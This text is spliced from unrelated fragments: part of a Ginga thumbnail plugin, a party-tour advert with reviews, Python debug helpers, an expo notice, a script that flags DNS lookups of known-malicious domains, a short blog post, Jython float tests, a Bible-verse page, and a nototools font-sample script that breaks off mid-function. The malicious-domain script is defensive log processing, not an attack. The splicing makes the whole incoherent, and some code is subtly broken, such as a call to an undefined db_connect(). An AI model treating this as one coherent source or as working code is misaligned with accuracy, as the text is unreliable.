self.get_thumbpath(path) if thumbpath != None: self.thumb_generator.save_image_as_file(thumbpath, format='jpeg') imgwin = self.thumb_generator.get_image_as_widget() imgwin.set_property("has-tooltip", True) imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata)) # Replace thumbnail image widget child = bnch.evbox.get_child() bnch.evbox.remove(child) bnch.evbox.add(imgwin) def delete_channel(self, viewer, chinfo): """Called when a channel is deleted from the main interface. Parameter is chinfo (a bunch).""" chname_del = chinfo.name.lower() # TODO: delete thumbs for this channel! self.logger.info("deleting thumbs for channel '%s'" % ( chname_del)) newThumbList = [] for thumbkey in self.thumbList: chname, path = thumbkey if chname != chname_del: newThumbList.append(thumbkey) else: del self.thumbDict[thumbkey] self.thumbList = newThumbList self.reorder_thumbs() def _make_thumb(self, chname, image, path, thumbkey, save_thumb=False, thumbpath=None): # This is called by the make_thumbs() as a gui thread self.thumb_generator.set_image(image) # Save a thumbnail for future browsing if save_thumb and (thumbpath != None): self.thumb_generator.save_image_as_file(thumbpath, format='jpeg') imgwin = self.thumb_generator.get_image_as_widget() # Get metadata for mouse-over tooltip image = self.thumb_generator.get_image() header = image.get_header() metadata = {} for kwd in self.keywords: metadata[kwd] = header.get(kwd, 'N/A') dirname, name = os.path.split(path) imgwin.set_property("has-tooltip", True) imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata)) thumbname = name if '.' in thumbname: thumbname = thumbname.split('.')[0] self.insert_thumbnail(imgwin, thumbkey, thumbname, chname, name, path) self.fv.update_pending(timeout=0.001) def make_thumbs(self, chname, filelist): # This is called by the FBrowser plugin, as a non-gui thread! lcname = chname.lower() cacheThumbs = self.settings.get('cacheThumbs', False) for path in filelist: self.logger.info("generating thumb for %s..." % ( path)) # Do we already have this thumb loaded? path = os.path.abspath(path) thumbkey = (lcname, path) if self.thumbDict.has_key(thumbkey): continue # Is there a cached thumbnail image on disk we can use? save_thumb = cacheThumbs image = None thumbpath = self.get_thumbpath(path) if (thumbpath != None) and os.path.exists(thumbpath): save_thumb = False try: image = self.fv.load_image(thumbpath) except Exception, e: pass try: if image == None: image = self.fv.load_image(path) self.fv.gui_do(self._make_thumb, chname, image, path, thumbkey, save_thumb=save_thumb, thumbpath=thumbpath) except Exception, e: self.logger.error("Error generating thumbnail for '%s': %s" % ( path, str(e))) continue # TODO: generate "broken thumb"? def _gethex(self, s): return hashlib.sha1(s).hexdigest() def get_thumbpath(self, path, makedir=True): path = os.path.abspath(path) dirpath, filename = os.path.split(path) # Get thumb directory cacheLocation = self.settings.get('cacheLocation', 'local') if cacheLocation == 'ginga': # thumbs in .ginga cache prefs = self.fv.get_preferences() thumbDir = os.path.join(prefs.get_baseFolder(), 'thumbs') thumbdir = os.path.join(thumbDir, self._gethex(dirpath)) else: # thumbs in .thumbs subdirectory of image folder thumbdir = os.path.join(dirpath, '.thumbs') if not os.path.exists(thumbdir): if not makedir: self.logger.error("Thumb directory does not exist: %s" % ( thumbdir)) return None try: os.mkdir(thumbdir) # Write meta file metafile = os.path.join(thumbdir, "meta") with open(metafile, 'w') as out_f: out_f.write("srcdir: %s\n" % (dirpath)) except OSError, e: self.logger.error("Could not make thumb directory '%s': %s" % ( thumbdir, str(e))) return None # Get location of thumb modtime = os.stat(path).st_mtime thumbkey = self._gethex("%s.%s" % (filename, modtime)) thumbpath = os.path.join(thumbdir, thumbkey + ".jpg") self.logger.debug("thumb path is '%s'" % (thumbpath)) return thumbpath def __str__(self): return 'thumbs' #END
All courses include lunch on school days, welcome drink, course books, graduation dinner, staff to assist you at all times, LIABP wristbands for discounts on Ios and trial shifts at partner bars (if wanting to stay on for the summer). We Love Receiving Feedback From The Legends Who Book With Us! Definitely going to travel with LIABP again! I never thought I would make so many friends on a holiday trip, but travelling with LIABP made it possible. We had the opportunity to do whatever we wanted to do, but the LIABP team always had a plan if we wanted to do something with the whole group. I can honestly say that the nights were so much funnier when we were a big group! I am definitely going to travel with LIABP next year, I can't wait to party with even more people! Travelling with LIABP to Ios was amazing, and I don't regret it for a second. I made so many new friends and got to experience things I wouldn't have if I was travelling alone. Definitely the time of my life! Met so many great people! I'll never forget my first trip with LIABP this summer. I met so many great people through LIABP, who made the whole experience perfect. I would never regret going on that Tour and there is no doubt that I will travel with LIABP in the next years! Hope to see you guys there. Travelling with LIABP was one of the most fun and wildest things that I've experienced. The atmosphere was great and it was almost like we all were part of a big family by the end of the trip. I'll join again next summer for sure! Totally recommended for everyone. Met the LIABP crew when I was in Ios in 2013.. Like a mini army conquering the bars and clubs of Ios together! You NEED to experience a LIABP holiday.. There are no words! Everyday was a new party! I joined LIABP for their Ios Tour this year and had the best time of my life. Everyday was a new party with heaps of cool new friends. I would have never experienced the things I did if I didn't Tour with LIABP, the amazing crew and everybody else on the Tour. We destroyed the island and I can't wait to do it all again next year! Ios is just amazing! Last summer with LIABP was one of the best times in my life! I met so many crazy people and made so much unforgettable memories. In normal life I'm very busy and I have to study a lot but a summer with LIABP helps me to get away from all this and enjoy happiness. PayPal is a quick and secure means of accepting online payments from customers with or without PayPal accounts. Accepts all major credit/debit cards (Visa & MasterCard), eCheques, Bank Transfers and PayPal accounts. You do not need a PayPal account to pay for your holiday with Life is a Beachparty. You can pay with a credit/debit card (Visa, MasterCard) via PayPal. A deposit payment must be paid at time of booking to confirm your booking! The remaining payment is not due until your holiday & should be paid during your stay in Barschool to your chosen hotel owner/manager (cash or credit/debit card options are available). For cancellation policy please read full terms & conditions. If you require further assistance please email us at ios@lifeisabeachparty.com. Payment process will be initiated after completing this booking. Allow 24 hours for funds to arrive and receive official confirmation documents. Our customer services team will help you with all of your holiday needs.
# # Copyright (C) 2009 Michael Budde <mbudde@gmail.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import os import inspect from functools import wraps """Is debugging enabled?""" DEBUGGING = False def debug(str): global DEBUGGING if not DEBUGGING: return s = inspect.stack()[1] print '{file}:{line}:{func}: {msg}'.format( file=os.path.basename(s[1]), line=s[2], func=s[3], msg=str) def debugfun(fun): global DEBUGGING if not DEBUGGING: return fun @wraps(fun) def wrapper(*args, **kwargs): res = fun(*args, **kwargs) print('{0} ( {1} {2} ) -> {3}'.format(fun.__name__, args, kwargs, res)) return res return wrapper def debugmethod(fun): @wraps(fun) def wrapper(klass, *args, **kwargs): info = { 'file': os.path.basename(inspect.stack()[1][1])[:-3], 'cls': klass.__class__.__name__, 'fun': fun.__name__, 'args': args, 'kwargs': kwargs } print('{file}.{cls}.{fun} <-- {args} {kwargs}'.format(**info)) info.update({'res': fun(klass, *args, **kwargs)}) print('{file}.{cls}.{fun} --> {res}'.format(**info)) return info['res'] return wrapper
ADMISSION & PARKING* IS FREE! Join us for the inaugural Movement Health & Wellness Expo featuring tons of great activities for everyone including the kiddos! Workshops, classes, demos, vendors, DJs and more! With over 100 exhibitors, kid’s fun run & obstacle course, sunrise yoga, fitness competitions, food demos and classes — there is something for everyone. This event is a charity event benefitting The Movember Foundation. Together we can make a difference for men’s health – in prostate cancer, testicular cancer, mental health, and suicide prevention. Get the day started with “Yoga in the Park” and enjoy classes and demos all day. Tons for the kiddos to do — from obstacle courses to rock walls and a bounce house. Beginner or elite athletes are all welcome! Click here to register. Guest speakers and workshops from our vendors and sponsors. Healthy food trucks will be on site with plenty of cuisines to satisfy everyone! Over 80 local and national brands will be on display. Click the button below to fill out the application!
import gzip from datetime import datetime import struct, socket import logging import os,sys import MySQLdb import glob import yaml from sys import exc_info appPath = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../") sys.path.append(appPath + "/lib/pylib") from pull_config import Configurator configr = Configurator() # Credentials used for the database connection configr = Configurator() DB = configr.get_var('db') HOST = configr.get_var('db_host') USERNAME = configr.get_var('db_user') PASSWORD = configr.get_var('db_pass') #logging set up logger = logging.getLogger('named_malware.py') hdlr = logging.FileHandler(appPath + '/logs/message_log') error_hdlr = logging.FileHandler(appPath + '/logs/error_log') formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s') hdlr.setFormatter(formatter) error_hdlr.setFormatter(formatter) error_hdlr.setLevel(logging.ERROR) logger.addHandler(hdlr) logger.addHandler(error_hdlr) logger.setLevel(logging.DEBUG) logger.debug('args: [\''+('\', \''.join(sys.argv))+'\']') #config vars named_dir = configr.get_var('approot')+"app/scripts/named/" #parse args and read import config if len(sys.argv)< 2: logger.error('Config file path required') exit(1) try: import_config=yaml.load(open(sys.argv[1],'r').read()) except: logger.error('Error loading config file: {0}'.format(sys.argv[1])) whitelisted_ips = set(import_config['whitelisted_ips']) src = import_config['named_src'] src_id = -1 #pre database lookup value chunksize = import_config['chunksize'] archive = import_config['archive'] current_year = datetime.today().year current_month = datetime.today().month domains = {} ips={} uniq_set = set() count = 0 conn = None cursor = None def connect_db(): global conn,cursor logger.info("Opening database connection") conn = MySQLdb.connect(host=HOST, user=USERNAME, passwd=PASSWORD, db=DB) cursor = conn.cursor() #Used add the correct year to the date because the logs do not contain the year def convert_date(d): dt=datetime.strptime(d,"%b %d %H:%M:%S") if current_month<12 and dt.month==12: dt=dt.replace(year=current_year-1) else: dt=dt.replace(year=current_year) return dt.strftime("%Y-%m-%d %H:%M:%S") #Check if the line is a dns resolution def is_dns_resolution(l): return len(l)>8 and l[5]=='client' and l[8]=='query:' #Checks if the record is unique #Also add the record to the unique set if it is unique def is_unique(record): global uniq_set if record in uniq_set: return False uniq_set.add(record) return True #Extracts the date from the line #Calls convert_date and returns the result def get_date(l): date = ' '.join(l[:3]) return convert_date(date) #Get ip and ip numeric from the ip portion of the log line def get_ip(ip): #strip off extra data ip = ip.split('#')[0] #Check if the numeric value was computed previously if ip in ips: ip_numeric=ips[ip] else: #Compute numeric value and store for quick lookup try: ip_numeric = struct.unpack('>L',socket.inet_aton(ip))[0] except: ip_numeric = -1 logger.error('error with ip numeric for record: {0}'.format(str(l))) raise ips[ip]=ip_numeric return ip,ip_numeric #Load all malicious domains from database into dictionary object for quick lookup def load_domains(): global domains query = "SELECT domain_id, domain_name from domain where domain_is_malicious > 0" try: cursor.execute(query) except AttributeError: logger.debug('no connection to db. calling connect_db') connect_db() cursor.execute(query) res = cursor.fetchall() for record in res: domains[record[1].lower()] = int(record[0]) #Get domain_id for a malicious domain #Returns -1 if domain is not marked malicious in database def get_domain_id(domain): global domains if len(domains)==0: load_domains() domain = domain.lower() if not domain in domains: return -1; domain_id = domains[domain] return domain_id #Returns source id for the named source def get_src_id(src): global src_id #If the source id was previously looked up return the locally saved value if src_id>=0: return src_id #Look up the id by source name query='select named_src_id from named_src where named_src_name=%s' try: cursor.execute(query,(src,)) except: db_connect() cursor.execute(query,(src,)) res = cursor.fetchone() #Source was not in database #Insert the source and return the new id if res == None: query = 'insert into named_src set named_src_name=%s' cursor.execute(query,(src,)) conn.commit() src_id = int(cursor.lastrowid) #Source was in database #Save id for faster lookup else: src_id = int(res[0]) return src_id def proc_line(line): #split line on spaces l = line.split() #check if the line corresponds to a dns resolution if is_dns_resolution(l): #get id for malicious domain dm_id = get_domain_id(l[9]) #If domain has id keep processing else skip record(return -1) if dm_id > -1: #Get ip and ip numeric ip,ip_numeric = get_ip(l[6]) #If ip in whitelist skip record(return -1) else keep processing if ip not in whitelisted_ips: #get date date = get_date(l) #get src_id src_id = get_src_id(src) #return string formatted for import return ','.join(str(x) for x in [date,ip,ip_numeric,dm_id,src_id]) #Indicate record will not be included in the import (skip record) return -1 #read gzipped log file line by line and write to files for archive and import def proc_file(filepath,archive_filepath,chunk_filepath_template,chunksize): logger.debug('processing file: {0}'.format(filepath)) logger.debug('chunk size: {0}'.format(chunksize)) count = 0 fnumber = 0 fchunkout=None chunk ='' #open gzipped log file fin = gzip.open(filepath,'r') for l in fin: res = proc_line(l) #If proc_line returned a formatted line and the line is unique if res != -1 and is_unique(res): #add line to chunk variable and inc counter chunk+=res+'\n' count+=1 #When chunk reaches the target chunksize write to files if count % chunksize == 0: chunk_filepath = chunk_filepath_template.format(fnumber) write_data(chunk,archive_filepath,chunk_filepath) fnumber+=1 chunk = '' #If there is a partial chunk at the end write it to files if chunk!='': chunk_filepath = chunk_filepath_template.format(fnumber) write_data(chunk,archive_filepath,chunk_filepath) fnumber+=1 fin.close() logger.info('{0} records written to {1} chunk files'.format(count,fnumber)) return fnumber #writes chunks to archive(gzipped) file and chunk file def write_data(data, archive_filepath, chunk_filepath): if archive: logger.debug('writing to archive file: {0}'.format(archive_filepath)) archivefile = gzip.open(archive_filepath,'a') archivefile.write(data) archivefile.close() logger.debug('writing to chunk file: {0}'.format(chunk_filepath)) with open(chunk_filepath,'w') as chunkfile: chunkfile.write(data) #Import chunk files into database one file at a time #chunks is a list of numbers corresponding to a chunkfile #chunk_filepath_template is a string that will produce the #full file path of the chunk file when given the chunk number def import_chunks(chunks,chunk_filepath_template): query = "load data local infile %s into table named_resolution fields terminated by ',' lines terminated by '\n' " + \ "(named_resolution_datetime,named_resolution_src_ip,named_resolution_src_ip_numeric,domain_id, named_src_id)" for i in chunks: logger.info('importing chunk: {0:03d}'.format(i)) try: cursor.execute(query,(chunk_filepath_template.format(i),)) conn.commit() except AttributeError: logger.debug('no connection to db. calling connect_db') connect_db() cursor.execute(query,(chunk_filepath_template.format(i),)) conn.commit() except: logger.error('import chunks error', exc_info=True) raise logger.info('importing chunk complete.') #Deletes chunk files #chunks is a list of numbers corresponding to a chunkfile #chunk_filepath_template is a string that will produce the #full file path of the chunk file when given the chunk number def delete_chunks(chunks,chunk_filepath_template): logger.info("Cleaning up chunk files.") for i in chunks: chunk_filepath=chunk_filepath_template.format(i) logger.debug('removing file: {0}'.format(chunk_filepath)) os.remove(chunk_filepath) if __name__=='__main__': logger.info('named.py starting') #Set paths for archive and chunk directories archive_dir=named_dir+'archive/'+src+'/' chunk_dir=named_dir+'chunks/'+src+'/' #Make sure the directories exist try: os.makedirs(archive_dir) except OSError: logger.debug('dir exists:{0}'.format(archive_dir)) try: os.makedirs(chunk_dir) except OSError: logger.debug('dir exists:{0}'.format(chunk_dir)) #for each file in the to_load directory that is from the source defined in the config # - Process file and create chunk files and archive file # - Import the chunkfiles into database # - Delete chunkfiles # - Delete original file files_to_load = glob.glob(named_dir+'to_load/{0}/*.{0}.log.gz'.format(src)) if len(files_to_load) == 0: logger.warning('No files to load. Exiting') exit(0) logger.debug('files to load: {0}'.format(files_to_load)) for f in files_to_load: uniq_set = set() filepath=f basename=os.path.basename(f).split('.log.gz')[0] chunk_filepath_template=chunk_dir+basename+'.{0}.csv' archive_filepath=archive_dir+basename+'.csv.gz' num_chunks = proc_file(filepath,archive_filepath,chunk_filepath_template,chunksize) import_chunks(xrange(num_chunks),chunk_filepath_template) delete_chunks(xrange(num_chunks),chunk_filepath_template) os.remove(f) conn.close() logger.info('named.py complete')
The weather may not be cooperating with the concept of "spring," but we have been very busy here. We have made several day trips, visited favorite places and new places, seen friends, gone to the dentist... you know, spring stuff. Nate had his 6 month check up with the Dentist... No cavities! And went to the Franklin Institute for the first time.
"""Float tests Made for Jython. """ import math import sys import unittest from test import test_support jython = test_support.is_jython class FloatTestCase(unittest.TestCase): def test_float_repr(self): self.assertEqual(repr(12345678.000000005), '12345678.000000006') self.assertEqual(repr(12345678.0000000005), '12345678.0') self.assertEqual(repr(math.pi**-100), jython and '1.9275814160560203e-50' or '1.9275814160560206e-50') self.assertEqual(repr(-1.0), '-1.0') self.assertEqual(repr(-9876.543210), jython and '-9876.54321' or '-9876.5432099999998') self.assertEqual(repr(0.123456789e+35), '1.23456789e+34') def test_float_str(self): self.assertEqual(str(12345678.000005), '12345678.0') self.assertEqual(str(12345678.00005), jython and '12345678.0' or '12345678.0001') self.assertEqual(str(12345678.00005), jython and '12345678.0' or '12345678.0001') self.assertEqual(str(12345678.0005), '12345678.0005') self.assertEqual(str(math.pi**-100), '1.92758141606e-50') self.assertEqual(str(0.0), '0.0') self.assertEqual(str(-1.0), '-1.0') self.assertEqual(str(-9876.543210), '-9876.54321') self.assertEqual(str(23456789012E666), 'inf') self.assertEqual(str(-23456789012E666), '-inf') def test_float_str_formatting(self): self.assertEqual('%.13g' % 12345678.00005, '12345678.00005') self.assertEqual('%.12g' % 12345678.00005, jython and '12345678' or '12345678.0001') self.assertEqual('%.11g' % 12345678.00005, '12345678') # XXX: The exponential formatter isn't totally correct, e.g. our # output here is really .13g self.assertEqual('%.12g' % math.pi**-100, '1.92758141606e-50') self.assertEqual('%.5g' % 123.005, '123') self.assertEqual('%#.5g' % 123.005, '123.00') self.assertEqual('%#g' % 0.001, '0.00100000') self.assertEqual('%#.5g' % 0.001, '0.0010000') self.assertEqual('%#.1g' % 0.0001, '0.0001') self.assertEqual('%#.4g' % 100, '100.0') self.assertEqual('%#.4g' % 100.25, '100.2') self.assertEqual('%g' % 0.00001, '1e-05') self.assertEqual('%#g' % 0.00001, '1.00000e-05') self.assertEqual('%e' % -400.0, '-4.000000e+02') self.assertEqual('%.2g' % 99, '99') self.assertEqual('%.2g' % 100, '1e+02') def test_overflow(self): shuge = '12345' * 120 shuge_float = float(shuge) shuge_int = int(shuge) self.assertRaises(OverflowError, float, shuge_int) self.assertRaises(OverflowError, int, shuge_float) # and cmp should not overflow self.assertNotEqual(0.1, shuge_int) def test_nan(self): nan = float('nan') self.assert_(type(nan), float) if jython: # support Java syntax self.assert_(type(float('NaN')), float) # CPython 2.4/2.5 allow this self.assertEqual(long(nan), 0) self.assertNotEqual(nan, float('nan')) self.assertNotEqual(nan, nan) self.assertEqual(cmp(nan, float('nan')), 1) self.assertEqual(cmp(nan, nan), 0) for i in (-1, 1, -1.0, 1.0): self.assertEqual(cmp(nan, i), -1) self.assertEqual(cmp(i, nan), 1) def test_infinity(self): self.assert_(type(float('Infinity')), float) self.assert_(type(float('inf')), float) self.assertRaises(OverflowError, long, float('Infinity')) def test_float_none(self): self.assertRaises(TypeError, float, None) def test_pow(self): class Foo(object): def __rpow__(self, other): return other ** 2 # regression in 2.5 alphas self.assertEqual(4.0 ** Foo(), 16.0) def test_faux(self): class F(object): def __float__(self): return 1.6 self.assertEqual(math.cos(1.6), math.cos(F())) def test_main(): test_support.run_unittest(FloatTestCase) if __name__ == '__main__': test_main()
Home » Bible Verses by Topic » Bible Verses about Peace ( 3 ) What Does the Bible Say about Peace? 63. For when they shall say, Peace and safety; then sudden destruction cometh upon them, as travail upon a woman with child; and they shall not escape. 1 Thessalonians 5:3 Bible Verses about Peace ( 3 ) What Does the Bible Say about Peace?
#!/usr/bin/env python # Copyright 2015 Google Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Generates script-specific samples (collections of chars) using cldr exemplar data for languages written in a script.""" import argparse import codecs import collections import locale import os from os import path from nototools.py23 import unichr from nototools import cldr_data from nototools import create_image from nototools import extra_locale_data from nototools import tool_utils from nototools import unicode_data try: from icu import Locale, Collator print("will use icu locale-specific order") _HAVE_ICU = True except ImportError as e: print("will use default locale sort order") _HAVE_ICU = False NOTO_TOOLS = path.abspath(path.join(path.dirname(__file__), os.pardir)) CLDR_DIR = path.join(NOTO_TOOLS, "third_party", "cldr") _VERBOSE = False def get_script_to_exemplar_data_map(): """Return a map from script to 3-tuples of: - locale tuple (lang, script, region, variant) - cldr_relative path to src of exemplar data - tuple of the exemplar chars""" script_map = collections.defaultdict(dict) for directory in ["common", "seed", "exemplars"]: data_dir = path.join(directory, "main") for filename in os.listdir(path.join(CLDR_DIR, data_dir)): if not filename.endswith(".xml"): continue exemplar_list = cldr_data.get_exemplar_from_file( path.join(data_dir, filename) ) if not exemplar_list: if _VERBOSE: print(" no exemplar list for %s" % path.join(data_dir, filename)) continue lsrv = cldr_data.loc_tag_to_lsrv(filename[:-4]) if not lsrv: if _VERBOSE: print(" no lsrv for %s" % path.join(data_dir, filename)) continue src = path.join(directory, filename) script = lsrv[1] if not script: if _VERBOSE: print(" no script for %s" % path.join(data_dir, filename)) continue loc_tag = cldr_data.lsrv_to_loc_tag(lsrv) loc_to_exemplar_info = script_map[script] if loc_tag in loc_to_exemplar_info: if _VERBOSE: print( "skipping %s, already have exemplars for %s from %s" % (src, loc_tag, loc_to_exemplar_info[loc_tag][1]) ) continue # fix exemplars that look incorrect if script == "Arab" and "d" in exemplar_list: if _VERBOSE: print("found 'd' in %s for %s" % (src, lsrv)) no_latin = True else: no_latin = False # exclude exemplar strings, and restrict to letters and digits def accept_cp(cp): if len(cp) != 1: return False cat = unicode_data.category(cp) if cat[0] != "L" and cat != "Nd": return False if no_latin and cp in "df": return False return True filtered_exemplar_list = filter(accept_cp, exemplar_list) # some exemplar lists don't surround strings with curly braces, and end up # with duplicate characters. Flag these exemplar_chars = set() dup_chars = set() fixed_exemplar_list = [] for cp in filtered_exemplar_list: if cp in exemplar_chars: dup_chars.add(cp) else: exemplar_chars.add(cp) fixed_exemplar_list.append(cp) if len(dup_chars) > 0 and _VERBOSE: print( "duplicate exemplars in %s: %s" % ( src, ", ".join( [u"\u200e%s\u200e (%x)" % (cp, ord(cp)) for cp in dup_chars] ), ) ) loc_to_exemplar_info[loc_tag] = (lsrv, src, tuple(fixed_exemplar_list)) # supplement with extra locale data for loc_tag in extra_locale_data.EXEMPLARS: exemplar_list = cldr_data.get_exemplar_from_extra_data(loc_tag) lang, script = loc_tag.split("-") lsrv = (lang, script, None, None) loc_to_exemplar_info = script_map[script] src = "[extra locale data]/%s" % loc_tag if loc_tag in loc_to_exemplar_info: if _VERBOSE: print( "skipping %s, already have exemplars for %s from %s" % (src, loc_tag, loc_to_exemplar_info[loc_tag][1]) ) continue # restrict to letters, except for zsym def accept_cp(cp): cat = unicode_data.category(cp) return cat[0] == "L" or cat == "Nd" if "Zsym" not in loc_tag: filtered_exemplar_list = filter(accept_cp, exemplar_list) if len(filtered_exemplar_list) != len(exemplar_list) and _VERBOSE: print("filtered some characters from %s" % src) else: filtered_exemplar_list = exemplar_list loc_to_exemplar_info[loc_tag] = (lsrv, src, tuple(filtered_exemplar_list)) return script_map def show_rarely_used_char_info(script, loc_map, char_to_lang_map): # let's list chars unique to each language for loc_tag in sorted(loc_map): unique_chars = [] dual_chars = [] dual_shared_with = set() triple_chars = [] triple_shared_with = set() info = loc_map[loc_tag] exemplars = info[2] for cp in exemplars: num_common_langs = len(char_to_lang_map[cp]) if num_common_langs == 1: unique_chars.append(cp) elif num_common_langs == 2: dual_chars.append(cp) for shared_loc_tag in char_to_lang_map[cp]: if shared_loc_tag != loc_tag: dual_shared_with.add(shared_loc_tag) elif num_common_langs == 3: triple_chars.append(cp) for shared_loc_tag in char_to_lang_map[cp]: if shared_loc_tag != loc_tag: triple_shared_with.add(shared_loc_tag) script_tag = "-" + script if unique_chars: print( "%s has %d unique chars: %s%s" % ( loc_tag, len(unique_chars), " ".join(unique_chars[:100]), "..." if len(unique_chars) > 100 else "", ) ) if dual_chars: print( "%s shares %d chars (%s%s) with 1 other lang: %s" % ( loc_tag, len(dual_chars), " ".join(dual_chars[:20]), "..." if len(dual_chars) > 20 else "", ", ".join( sorted( [loc.replace(script_tag, "") for loc in dual_shared_with] ) ), ) ) if triple_chars: print( "%s shares %d chars (%s%s) with 2 other langs: %s" % ( loc_tag, len(triple_chars), " ".join(triple_chars[:20]), "..." if len(triple_chars) > 20 else "", ", ".join( sorted( [loc.replace(script_tag, "") for loc in triple_shared_with] ) ), ) ) if not (unique_chars or dual_chars or triple_chars): print("%s shares all chars with 3+ other langs" % loc_tag) def get_char_to_lang_map(loc_map): char_to_lang_map = collections.defaultdict(list) for loc_tag in sorted(loc_map): info = loc_map[loc_tag] exemplars = info[2] for cp in exemplars: if loc_tag in char_to_lang_map[cp]: print( "loc %s (from %s) already in char_to_lang_map for %s (%x)" % (loc_tag, info[1], cp, ord(cp)) ) else: char_to_lang_map[cp].append(loc_tag) return char_to_lang_map def char_lang_info(num_locales, char_to_lang_map): """Returns a tuple containing - characters ordered by the number of langs that use them - a list mapping number of shared langs to number of chars shared by those langs""" freq_list = [] hist = [0] * (num_locales + 1) for cp in char_to_lang_map: num_shared_langs = len(char_to_lang_map[cp]) if num_shared_langs >= len(hist): for shared_lang in char_to_lang_map[cp]: if shared_lang not in loc_map: print("loc map does not have '%s'!" % shared_lang) freq_list.append((num_shared_langs, cp)) if num_shared_langs >= len(hist): print( "num shared langs is %d but size of hist is %d" % (num_shared_langs, len(hist)) ) hist[num_shared_langs] += 1 freq_list.sort() return [cp for nl, cp in freq_list], hist def show_char_use_info(script, chars_by_num_langs, char_to_lang_map): script_tag = "-" + script for cp in chars_by_num_langs: langs = char_to_lang_map[cp] count = len(langs) limit = 12 without_script = [loc.replace(script_tag, "") for loc in langs[:limit]] without_script_str = ", ".join(sorted(without_script)) if count > limit: without_script_str += "..." print(u"char %s\u200e (%x): %d %s" % (cp, ord(cp), count, without_script_str)) print("total chars listed: %d" % len(char_to_lang_map)) def show_shared_langs_hist(hist): # histogram - number of chars per number of shared languages for i in range(1, len(hist)): print("[%3d] %3d %s" % (i, hist[i], "x" * hist[i])) def get_upper_case_list(char_list): """Return the upper case versions where they differ. If no char in the list is a lower case variant, the result is empty.""" # keep in same order as input list. upper_case_chars = [] for cp in char_list: upcp = unicode_data.to_upper(cp) if upcp != cp: upper_case_chars.append(upcp) return upper_case_chars def show_tiers(char_list, num_tiers, tier_size): for tier in range(1, num_tiers + 1): if tier == 1: subset = char_list[-tier_size:] else: subset = char_list[tier * -tier_size : (tier - 1) * -tier_size] if not subset: break tier_chars = sorted(subset) print("tier %d: %s" % (tier, " ".join(tier_chars))) upper_case_chars = get_upper_case_list(tier_chars) if upper_case_chars: print(" upper: " + " ".join(upper_case_chars)) def get_rare_char_info(char_to_lang_map, shared_lang_threshold): """Returns a tuple of: - a set of 'rare_chars' (those used threshold langs or fewer), - a mapping from each locale with rare chars to a set of its rare chars""" rare_chars = set() locs_with_rare_chars = collections.defaultdict(set) for cp in char_to_lang_map: num_shared_langs = len(char_to_lang_map[cp]) if num_shared_langs <= shared_lang_threshold: rare_chars.add(cp) for lang_tag in char_to_lang_map[cp]: locs_with_rare_chars[lang_tag].add(cp) return rare_chars, locs_with_rare_chars _lang_for_script_map = {} def _init_lang_for_script_map(): locs_by_lit_pop = [ loc for _, loc in cldr_data.get_lang_scrs_by_decreasing_global_lit_pop() ] for t in locs_by_lit_pop: lsrv = cldr_data.loc_tag_to_lsrv(t) script = lsrv[1] if script not in _lang_for_script_map: lang = lsrv[0] # print('%s lang => %s' % (script, lang)) _lang_for_script_map[script] = lang def lang_for_script(script): """Return the most common language for a script based on literate population.""" # should use likely subtag data for this. # the current code assumes all we want is lang -> script, I'd have to change # it to map locale->locale. Right now I dont' get Hant -> zh_Hant, only # Hant -> zh, which isn't good enough I think. if not _lang_for_script_map: _init_lang_for_script_map() return _lang_for_script_map.get(script) def select_rare_chars_for_loc( script, locs_with_rare_chars, shared_lang_threshold, char_to_lang_map ): """Return a list of 2-tuples of loc and selected rare chars, ordered by decreasing literate population of the locale.""" rarity_threshold_map = {} for lang_tag in locs_with_rare_chars: rarity_threshold_map[lang_tag] = shared_lang_threshold selected = [] locs_by_lit_pop = [ loc for _, loc in cldr_data.get_lang_scrs_by_decreasing_global_lit_pop() ] # examine locales in decreasing order of literate population for loc_tag in locs_by_lit_pop: if script not in loc_tag: continue loc_tag = loc_tag.replace("_", "-") if loc_tag not in locs_with_rare_chars: continue most_specific_chars = set() most_specific_chars_count = rarity_threshold_map[loc_tag] # From the rare chars for this locale, select those that # are most specific to this language. In most cases they # are unique to this language. for cp in locs_with_rare_chars[loc_tag]: num_chars = len(char_to_lang_map[cp]) if num_chars <= most_specific_chars_count: if num_chars < most_specific_chars_count: most_specific_chars = set() most_specific_chars.add(cp) most_specific_chars_count = num_chars if most_specific_chars: selected.append((loc_tag, most_specific_chars)) for cp in most_specific_chars: for tag in char_to_lang_map[cp]: if rarity_threshold_map[tag] > most_specific_chars_count: rarity_threshold_map[tag] = most_specific_chars_count return selected def show_selected_rare_chars(selected): print("langs with rare chars by lang pop:") for lang_tag, chars in selected: print("%10s: %s" % (lang_tag, ", ".join(sorted(chars)))) def sort_for_script(cp_list, script): lang = lang_for_script(script) if not lang: print("cannot sort for script, no lang for %s" % script) return cp_list if _HAVE_ICU: from icu import Locale, Collator loc = Locale(lang + "_" + script) col = Collator.createInstance(loc) return sorted(cp_list, cmp=col.compare) else: import locale return sorted(cp_list, cmp=locale.strcoll) def addcase(sample, script): cased_sample = [] for cp in sample: ucp = unicode_data.to_upper(cp) if ucp != cp and ucp not in sample: # Copt has cased chars paired in the block cased_sample.append(ucp) if cased_sample: cased_sample = " ".join(cased_sample) if _VERBOSE: print("add case for %s" % script) return sample + "\n" + cased_sample return sample def _generate_excluded_characters(): # Some of these exclusions are desired, and some are reluctantly applied because # Noto currently does not support some characters. We use the generated # data as fallback samples on a per-script and not per-font basis, which is also # a problem. # Religious characters # deva OM, Arabic pbuh, bismillah codepoints = [0x950, 0xFDFA, 0xFDFD] # Cyrillic characters not in sans or serif codepoints.append(0x2E2F) for cp in range(0xA640, 0xA680): codepoints.append(cp) # Arabic character not in kufi 